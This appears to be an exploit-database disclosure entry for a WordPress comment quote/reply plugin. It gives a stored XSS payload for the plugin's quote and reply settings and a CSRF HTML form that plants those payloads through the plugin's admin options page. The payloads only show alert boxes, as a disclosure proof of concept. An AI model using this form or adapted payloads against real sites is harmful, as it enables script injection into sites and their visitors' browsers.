## https://sploitus.com/exploit?id=WPEX-ID:AA23F743-811B-4FD1-81A9-42916342E312
Put the following payload in the 'Quote String' or 'Reply String' settings of the plugin, then view a frontend page where there is a comment to trigger the XSS: <script>alert(/XSS/)</script>
Via CSRF:
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=jqr2c.php" method="POST">
<input type="hidden" name="jqr2c_reply" value="Reply<script>alert(/Reply/)</script>" />
<input type="hidden" name="jqr2c_quote" value="Quote<script>alert(/Quote/)</script>" />
<input type="hidden" name="jqr2c_usephp" value="1" />
<input type="hidden" name="jqr2c_position" value="bottom" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>